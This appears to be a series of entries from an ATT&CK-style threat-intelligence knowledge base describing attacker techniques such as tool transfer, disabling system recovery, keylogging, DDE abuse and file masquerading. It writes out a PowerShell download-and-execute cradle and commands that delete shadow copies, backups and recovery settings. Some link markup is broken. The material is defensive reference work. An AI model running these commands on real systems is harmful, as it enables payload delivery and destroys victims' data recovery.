Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8). For example, [Forfiles](https://app.tidalcyber.com/software/c6dc67a6-587d-4700-a7de-bee043a0031a), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), Run window, or via scripts. <sup>[[VectorSec ForFiles Aug 2017](https://app.tidalcyber.com/references/8088d15d-9512-4d12-a99a-c76ad9dc3390)]</sup> <sup>[[Evi1cg Forfiles Nov 2017](https://app.tidalcyber.com/references/b292b85e-68eb-43c3-9b5b-222810e2f26a)]</sup>

Adversaries may abuse these features for [Defense Evasion](https://app.tidalcyber.com/tactics/8e29c6c9-0c10-4bb0-827d-ff0ab8922726), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) or file extensions more commonly associated with malicious payloads.

The tag is: misp-galaxy:technique="Indirect Command Execution"

Ingress Tool Transfer

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f)).

On Windows, adversaries may use various utilities to download tools, such as copy, finger, [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043), and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.<sup>[[t1105_lolbas](https://app.tidalcyber.com/references/80e649f5-6c74-4d66-a452-4f4cd51501da)]</sup>

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts.

Files can also be transferred using various [Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)s as well as native or otherwise present tools on the victim system.<sup>[[PTSecurity Cobalt Dec 2016](https://app.tidalcyber.com/references/2de4d38f-c99d-4149-89e6-0349a4902aa2)]</sup> In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service’s web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim’s machine.<sup>[[Dropbox Malware Sync](https://app.tidalcyber.com/references/06ca63fa-8c6c-501c-96d3-5e7e45ca1e04)]</sup>

The tag is: misp-galaxy:technique="Ingress Tool Transfer"

Inhibit System Recovery

Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup> This may deny access to available backups and recovery options.

Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and [Data Encrypted for Impact]([Talos Olympic Destroyer 2018(https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup> Furthermore, adversaries may disable recovery notifications, then corrupt backups.<sup>[[disable_notif_synology_ransom](https://app.tidalcyber.com/references/d53e8f89-df78-565b-a316-cf2644c5ed36)]</sup>

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

  • <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>

  • [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>

  • <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>

  • <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>

  • <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system

On network devices, adversaries may leverage [Disk Wipe](https://app.tidalcyber.com/technique/ea2b3980-05fd-41a3-8ab9-3106e833c821) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.

Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.<sup>[[ZDNet Ransomware Backups 2020](https://app.tidalcyber.com/references/301da9c8-60de-58f0-989f-6b504e3457a3)]</sup> In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.<sup>[[Dark Reading Code Spaces Cyber Attack](https://app.tidalcyber.com/references/e5a3028a-f4cc-537c-9ddd-769792ab33be)]</sup><sup>[[Rhino Security Labs AWS S3 Ransomware](https://app.tidalcyber.com/references/785c6b11-c5f0-5cb4-931b-cf75fcc368a1)]</sup>

The tag is: misp-galaxy:technique="Inhibit System Recovery"

Credential API Hooking

Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.<sup>[[Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017](https://app.tidalcyber.com/references/2b0c16e3-9ea0-455e-ae01-18d9b388fea6)]</sup> Unlike [Keylogging](https://app.tidalcyber.com/technique/7f1798b5-b159-441b-a5ef-3b5c706e1699), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:

The tag is: misp-galaxy:technique="Credential API Hooking"

GUI Input Capture

Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d)).

Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.<sup>[[OSX Malware Exploits MacKeeper](https://app.tidalcyber.com/references/8c4bcbc7-ff52-4f7b-a22e-98bf9cfb1040)]</sup> This type of prompt can be used to collect credentials via various languages such as [AppleScript]([LogRhythm Do You Trust Oct 2014(https://app.tidalcyber.com/references/88a84f9a-e077-4fdd-9936-30fc7b290476)]</sup><sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup><sup>[[Spoofing credential dialogs](https://app.tidalcyber.com/references/4f8abaae-1483-4bf6-a79c-6a801ae5a640)]</sup> and [PowerShell]([LogRhythm Do You Trust Oct 2014(https://app.tidalcyber.com/references/88a84f9a-e077-4fdd-9936-30fc7b290476)]</sup><sup>[[Enigma Phishing for Credentials Jan 2015](https://app.tidalcyber.com/references/7fff81f0-2b99-4f4f-8eca-c6a54c4d8205)]</sup><sup>[[Spoofing credential dialogs](https://app.tidalcyber.com/references/4f8abaae-1483-4bf6-a79c-6a801ae5a640)]</sup> On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell]([Spoofing credential dialogs(https://app.tidalcyber.com/references/4f8abaae-1483-4bf6-a79c-6a801ae5a640)]</sup>

The tag is: misp-galaxy:technique="GUI Input Capture"

Keylogging

Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.<sup>[[Talos Kimsuky Nov 2021](https://app.tidalcyber.com/references/17927f0e-297a-45ec-8e1c-8a33892205dc)]</sup>

Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.<sup>[[Adventures of a Keystroke](https://app.tidalcyber.com/references/f29ed400-2986-4b2c-9b8a-7dde37562d22)]</sup> Some methods include:

The tag is: misp-galaxy:technique="Keylogging"

Web Portal Capture

Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.

This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) and [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) or as part of the initial compromise by exploitation of the externally facing web service.<sup>[[Volexity Virtual Private Keylogging](https://app.tidalcyber.com/references/b299f8e7-01da-4d59-9657-ef93cf284cc0)]</sup>

The tag is: misp-galaxy:technique="Web Portal Capture"

Input Capture

Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://app.tidalcyber.com/technique/28fd13d1-b555-47fa-9d47-caf6b1367ace)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://app.tidalcyber.com/technique/34674b83-86a7-4ad9-8b05-49b505aa5ef0)).

The tag is: misp-galaxy:technique="Input Capture"

Internal Spearphishing

Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user’s device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.<sup>[[Trend Micro When Phishing Starts from the Inside 2017](https://app.tidalcyber.com/references/dbdc2009-a468-439b-bd96-e6153b3fb8a1)]</sup>

Adversaries may leverage [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) or [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f) on sites that mimic email login interfaces.

There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.<sup>[[Trend Micro When Phishing Starts from the Inside 2017](https://app.tidalcyber.com/references/dbdc2009-a468-439b-bd96-e6153b3fb8a1)]</sup> The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.<sup>[[THE FINANCIAL TIMES LTD 2019.](https://app.tidalcyber.com/references/5a01f0b7-86f7-44a1-bf35-46a631402ceb)]</sup>

The tag is: misp-galaxy:technique="Internal Spearphishing"

Component Object Model

Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup> Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).<sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup> Remote COM execution is facilitated by [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) (DCOM).<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup>

Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic]([Microsoft COM(https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup> Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup><sup>[[ProjectZero File Write EoP Apr 2018](https://app.tidalcyber.com/references/2c49288b-438d-487a-8e6e-f9d9eda73e2f)]</sup>

The tag is: misp-galaxy:technique="Component Object Model"

Dynamic Data Exchange

Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.<sup>[[BleepingComputer DDE Disabled in Word Dec 2017](https://app.tidalcyber.com/references/d6f93310-77b6-491e-ba9d-ec1faf8de7e4)]</sup><sup>[[Microsoft ADV170021 Dec 2017](https://app.tidalcyber.com/references/ce960e76-848f-440d-9843-54773f7b11cf)]</sup><sup>[[Microsoft DDE Advisory Nov 2017](https://app.tidalcyber.com/references/955b0074-a1d6-40b5-9437-bd2548daf54c)]</sup>

Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.<sup>[[SensePost PS DDE May 2016](https://app.tidalcyber.com/references/28b3c105-8d64-4767-a735-d353d1fee756)]</sup><sup>[[Kettle CSV DDE Aug 2014](https://app.tidalcyber.com/references/2badfb63-19a3-4829-bbb5-7c3dfab877d5)]</sup><sup>[[Enigma Reviving DDE Jan 2018](https://app.tidalcyber.com/references/188a0f02-8d1e-4e4e-b2c0-ddf1bf1bdf93)]</sup><sup>[[SensePost MacroLess DDE Oct 2017](https://app.tidalcyber.com/references/1036fbbb-f731-458a-b38c-42431612c0ad)]</sup> Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.<sup>[[OWASP CSV Injection](https://app.tidalcyber.com/references/0cdde66c-a7ae-48a2-8ade-067643de304d)]</sup><sup>[[CSV Excel Macro Injection ](https://app.tidalcyber.com/references/22c871ff-2701-4809-9f5b-fb29da7481e8)]</sup>

DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c). DDE execution can be invoked remotely via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) (DCOM).<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup>

The tag is: misp-galaxy:technique="Dynamic Data Exchange"

XPC Services

Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.<sup>[[creatingXPCservices](https://app.tidalcyber.com/references/029acdee-95d6-47a7-86de-0f6b925cef9c)]</sup><sup>[[Designing Daemons Apple Dev](https://app.tidalcyber.com/references/4baac228-1f6a-4c65-ae98-5a542600dfc6)]</sup>

Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application’s XPC Services handler.<sup>[[CVMServer Vuln](https://app.tidalcyber.com/references/6f83da0c-d2ce-4923-ba32-c6886eb22587)]</sup><sup>[[Learn XPC Exploitation](https://app.tidalcyber.com/references/da995792-b78b-4db5-85d8-99fda96c6826)]</sup> This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c).

The tag is: misp-galaxy:technique="XPC Services"

Inter-Process Communication

Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern.

Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://app.tidalcyber.com/technique/82497cfd-725e-42f8-aaa7-4e20878a6a13) or [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.<sup>[[Linux IPC](https://app.tidalcyber.com/references/05293061-ce09-49b5-916a-bb7353acfdfa)]</sup> Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) to facilitate remote IPC execution.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup>

The tag is: misp-galaxy:technique="Inter-Process Communication"

Lateral Tool Transfer

Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.

Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) to connected network shares or with authenticated connections via [Remote Desktop Protocol]([Unit42 LockerGoga 2019(https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]</sup>

Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca). In some cases, adversaries may be able to leverage [Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.<sup>[[Dropbox Malware Sync](https://app.tidalcyber.com/references/06ca63fa-8c6c-501c-96d3-5e7e45ca1e04)]</sup>

The tag is: misp-galaxy:technique="Lateral Tool Transfer"

Log Enumeration

Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3)), security or vulnerable software ([Software Discovery](https://app.tidalcyber.com/technique/e9bff6ff-3142-4910-8f67-19b868912602)), or hosts within a compromised network ([Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f)).

Host binaries may be leveraged to collect system logs. Examples include using wevtutil.exe or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) on Windows to access and/or export security event information.<sup>[[WithSecure Lazarus-NoPineapple Threat Intel Report 2023](https://app.tidalcyber.com/references/195922fa-a843-5cd3-a153-32f0b960dcb9)]</sup><sup>[[Cadet Blizzard emerges as novel threat actor](https://app.tidalcyber.com/references/7180c6a7-e6ea-54bf-bcd7-c5238bbc5f5b)]</sup> In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s CollectGuestLogs.exe to collect security logs from cloud hosted infrastructure.<sup>[[SIM Swapping and Abuse of the Microsoft Azure Serial Console](https://app.tidalcyber.com/references/c596a0e0-6e9c-52e4-b1bb-9c0542f960f2)]</sup>

Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.

The tag is: misp-galaxy:technique="Log Enumeration"

Break Process Trees

An adversary may attempt to evade process tree-based analysis by modifying executed malware’s parent process ID (PPID). If endpoint protection software leverages the “parent-child" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.<sup>[[3OHA double-fork 2022](https://app.tidalcyber.com/references/521b79fe-bb7b-52fd-a899-b73e254027a5)]</sup>

On Linux systems, adversaries may execute a series of [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls to alter malware’s process tree. For example, adversaries can execute their payload without any arguments, call the fork() API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the init system process (PID 1), which successfully disconnects the execution of the adversary’s payload from its previous process tree.

Another example is using the “daemon” syscall to detach from the current parent process and run in the background.<sup>[[Sandfly BPFDoor 2022](https://app.tidalcyber.com/references/01c8337f-614b-5f63-870f-5c880b390922)]</sup><sup>[[Microsoft XorDdos Linux Stealth 2022](https://app.tidalcyber.com/references/6425d351-2c88-5af9-970a-4d0d184d0c70)]</sup>

The tag is: misp-galaxy:technique="Break Process Trees"

Double File Extension

Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.<sup>[[PCMag DoubleExtension](https://app.tidalcyber.com/references/a729519d-8c9f-477c-b992-434076a9d294)]</sup><sup>[[SOCPrime DoubleExtension](https://app.tidalcyber.com/references/14a99228-de84-4551-a6b5-9c6f1173f292)]</sup>

Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://app.tidalcyber.com/tactics/586a5b49-c566-4a57-beb4-e7c667f9c34c) into a user’s system via [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) then [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.<sup>[[SOCPrime DoubleExtension](https://app.tidalcyber.com/references/14a99228-de84-4551-a6b5-9c6f1173f292)]</sup>

Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.

The tag is: misp-galaxy:technique="Double File Extension"

Invalid Code Signature

Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.<sup>[[Threatexpress MetaTwin 2017](https://app.tidalcyber.com/references/156efefd-793f-4219-8904-ef160a45c9ec)]</sup>

Unlike [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), this activity will not result in a valid signature.

The tag is: misp-galaxy:technique="Invalid Code Signature"

Masquerade File Type

Adversaries may masquerade malicious payloads as legitimate files through changes to the payload’s formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is <code> 0xFF 0xD8</code> and the file extension is either .JPE, .JPEG or .JPG.

Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) and stored (e.g., [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe)) so that adversaries may move their malware without triggering detections.

Common non-executable file types and extensions, such as text files (.txt) and image files (.jpg, .gif, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of <code>test.gif</code>. A user may not know that a file is malicious due to the benign appearance and file extension.

Polygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.<sup>[[polygot_icedID](https://app.tidalcyber.com/references/dcd65d74-4e7b-5ddd-8c72-700456981347)]</sup>

The tag is: misp-galaxy:technique="Masquerade File Type"

Masquerade Task or Service

Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.<sup>[[TechNet Schtasks](https://app.tidalcyber.com/references/17c03e27-222d-41b5-9fa2-34f0939e5371)]</sup><sup>[[Systemd Service Units](https://app.tidalcyber.com/references/43bae447-d2e3-4b53-b17b-12a0b54ac604)]</sup> Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.

Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.<sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Fysbis Dr Web Analysis](https://app.tidalcyber.com/references/f1eb4818-fda6-46f2-9d5a-5469a5ed44fc)]</sup>

The tag is: misp-galaxy:technique="Masquerade Task or Service"

Match Legitimate Name or Location

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.

The tag is: misp-galaxy:technique="Match Legitimate Name or Location"

Rename System Utilities

Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. <sup>[[LOLBAS Main Site](https://app.tidalcyber.com/references/615f6fa5-3059-49fc-9fa4-5ca0aeff4331)]</sup> It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). <sup>[[Elastic Masquerade Ball](https://app.tidalcyber.com/references/29c17b60-f947-4482-afa6-c80ca5819d10)]</sup> An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. <sup>[[F-Secure CozyDuke](https://app.tidalcyber.com/references/08e1d233-0580-484e-b737-af091e2aa9ea)]</sup>

The tag is: misp-galaxy:technique="Rename System Utilities"

Right-to-Left Override

Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.<sup>[[Infosecinstitute RTLO Technique](https://app.tidalcyber.com/references/79d21506-07a8-444d-a2d7-c91de67c393e)]</sup>

